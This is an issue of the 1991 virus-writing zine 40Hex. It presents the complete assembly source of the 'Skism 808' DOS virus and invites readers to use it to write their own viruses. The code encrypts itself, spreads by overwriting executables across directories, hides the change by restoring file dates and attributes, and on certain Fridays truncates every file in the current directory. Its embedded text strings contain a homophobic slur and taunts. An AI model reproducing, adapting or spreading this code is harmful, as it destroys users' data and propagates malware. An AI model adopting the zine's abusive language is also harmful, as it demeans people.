40Hex Volume 1 Issue 2 0010 The 808 Virus Here another virus from Skism. It's a quick overwriting virus but you can use the source code to write your own viruses. ------------------------------------------------------------------------------ ;The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods. filename EQU 30 ;used to find file name fileattr EQU 21 ;used to find file attributes filedate EQU 24 ;used to find file date filetime EQU 22 ;used to find file time code_start EQU 0100h ;start of all .COM files virus_size EQU 808 ;TR 808 code segment 'code' assume cs:code,ds:code,es:code org code_start main proc near jmp virus_start encrypt_val db 00h virus_start: call encrypt ;encrypt/decrypt file jmp virus ;go to start of code encrypt: push cx mov bx,offset virus_code ;start encryption at data xor_loop: mov ch,[bx] ;read current byte xor ch,encrypt_val ;get encryption key mov [bx],ch ;switch bytes inc bx ;move bx up a byte cmp bx,offset virus_code+virus_size ;are we done with the encryption jle xor_loop ;no? keep going pop cx ret infectfile: mov dx,code_start ;where virus starts in memory mov bx,handle ;load bx with handle push bx ;save handle on stack call encrypt ;encrypt file pop bx ;get back bx mov cx,virus_size ;number of bytes to write mov ah,40h ;write to file int 21h ; push bx call encrypt ;fix up the mess pop bx ret virus_code: wildcards db "*",0 ;search for directory argument filespec db "*.EXE",0 ;search for EXE file argument filespec2 db "*.*",0 rootdir db "\",0 ;argument for root directory dirdata db 43 dup (?) ;holds directory DTA filedata db 43 dup (?) ;holds files DTA diskdtaseg dw ? ;holds disk dta segment diskdtaofs dw ? ;holds disk dta offset tempofs dw ? ;holds offset tempseg dw ? ;holds segment drivecode db ? ;holds drive code currentdir db 64 dup (?) ;save current directory into this handle dw ? ;holds file handle orig_time dw ? ;holds file time orig_date dw ? ;holds file date orig_attr dw ? ;holds file attr idbuffer dw 2 dup (?) ;holds virus id virus: mov ax,3000h ;get dos version int 21h ; cmp al,02h ;is it at least 2.00? jb bus1 ;won't infect less than 2.00 mov ah,2ch ;get time int 21h ; mov encrypt_val,dl ;save m_seconds to encrypt val so ;theres 100 mutations possible setdta: mov dx,offset dirdata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; newdir: mov ah,19h ;get drive code int 21h ; mov dl,al ;save drivecode inc dl ;add one to dl, because functions differ mov ah,47h ;get current directory mov si, offset currentdir ;buffer to save directory in int 21h ; mov dx,offset rootdir ;move dx to change to root directory mov ah,3bh ;change directory to root int 21h ; scandirs: mov cx,13h ;include hidden/ro directorys mov dx, offset wildcards ;look for '*' mov ah,4eh ;find first file int 21h ; cmp ax,12h ;no first file? jne dirloop ;no dirs found? bail out bus1: jmp bus dirloop: mov ah,4fh ;find next file int 21h ; cmp ax,12h je bus ;no more dirs found, roll out chdir: mov dx,offset dirdata+filename;point dx to fcb - filename mov ah,3bh ;change directory int 21h ; mov ah,2fh ;get current dta address int 21h ; mov [diskdtaseg],es ;save old segment mov [diskdtaofs],bx ;save old offset mov dx,offset filedata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; scandir: mov cx,07h ;find any attribute mov dx,offset filespec ;point dx to "*.COM",0 mov ah,4eh ;find first file function int 21h ; cmp ax,12h ;was file found? jne transform nextexe: mov ah,4fh ;find next file int 21h ; cmp ax,12h ;none found jne transform ;found see what we can do mov dx,offset rootdir ;move dx to change to root directory mov ah,3bh ;change directory to root int 21h ; mov ah,1ah ;set dta address mov ds,[diskdtaseg] ;restore old segment mov dx,[diskdtaofs] ;restore old offset int 21h ; jmp dirloop bus: jmp rollout transform: mov ah,2fh ;temporally store dta int 21h ; mov [tempseg],es ;save old segment mov [tempofs],bx ;save old offset mov dx, offset filedata + filename mov bx,offset filedata ;save file... mov ax,[bx]+filedate ;date mov orig_date,ax ; mov ax,[bx]+filetime ;time mov orig_time,ax ; and mov ax,[bx]+fileattr ; mov ax,4300h int 21h mov orig_attr,cx mov ax,4301h ;change attributes xor cx,cx ;clear attributes int 21h ; mov ax,3d00h ;open file - read int 21h ; jc fixup ;error - find another file mov handle,ax ;save handle mov ah,3fh ;read from file mov bx,handle ;move handle to bx mov cx,02h ;read 2 bytes mov dx,offset idbuffer ;save to buffer int 21h ; mov ah,3eh ;close file for now mov bx,handle ;load bx with handle int 21h ; mov bx, idbuffer ;fill bx with id string cmp bx,02ebh ;infected? jne doit ;same - find another file fixup: mov ah,1ah ;set dta address mov ds,[tempseg] ;restore old segment mov dx,[tempofs] ;restore old offset int 21h ; jmp nextexe doit: mov dx, offset filedata + filename mov ax,3d02h ;open file read/write access int 21h ; mov handle,ax ;save handle call infectfile ;mov ax,3eh ;close file ;int 21h rollout: mov ax,5701h ;restore original mov bx,handle ; mov cx,orig_time ;time and mov dx,orig_date ;date int 21h ; mov ax,4301h ;restore original attributes mov cx,orig_attr mov dx,offset filedata + filename int 21h ;mov bx,handle ;mov ax,3eh ;close file ;int 21h mov ah,3bh ;try to fix this mov dx,offset rootdir ;for speed int 21h ; mov ah,3bh ;change directory mov dx,offset currentdir ;back to original int 21h ; mov ah,2ah ;check system date int 21h ; cmp cx,1991 ;is it at least 1991? jb audi ;no? don't do it now cmp dl,25 ;is it the 25th? jb audi ;not yet? quit cmp al,5 ;is Friday? jne audi ;no? quit mov dx,offset dirdata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; mov ah,4eh ;find first file mov cx,7h ; mov dx,offset filespec2 ;offset *.* Loops: int 21h ; jc audi ;error? then quit mov ax,4301h ;find all normal files xor cx,cx ; int 21h ; mov dx,offset dirdata + filename mov ah,3ch ;fuck up all files in current dir int 21h ; jc audi ;error? quit mov ah,4fh ;find next file jmp loops ; audi: mov ax,4c00h ;end program int 21h ; ;The below is just text to pad out the virus size to 808 bytes. Don't ;just change the text and claim that this is your creation. words_ db "Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods",0 words2 db " Dont alter this code into your own strain, faggit. ",0 words3 db " HR/SSS NYCity, this is the fifth of many, many more....",0 words4 db " You sissys.....",0 main endp code ends end main ------------------------------------------------------------------------------ HR